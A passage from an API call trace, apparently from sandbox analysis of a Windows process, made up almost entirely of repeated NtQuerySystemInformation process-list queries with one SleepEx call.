SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a040) returned 0x0 [0145.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a040) returned 0x0 [0145.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a040) returned 0x0 [0145.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a040) returned 0x0 [0145.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a040) returned 0x0 [0145.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a040) returned 0x0 [0145.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a040) returned 0x0 [0145.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a040) returned 0x0 [0145.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a040) returned 0x0 [0145.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a040) returned 0x0 [0145.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a040) returned 0x0 [0145.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a040) returned 0x0 [0145.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a148) returned 0x0 [0145.762] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0148.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a418) returned 0x0 [0148.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a528) returned 0x0 [0148.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a4e8) returned 0x0 [0148.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a4e8) returned 0x0 [0148.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a4e8) returned 0x0 [0148.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a4e8) returned 0x0 [0148.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a4e8) returned 0x0 [0148.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a4e8) returned 0x0 [0148.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a4e8) returned 0x0 [0148.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, 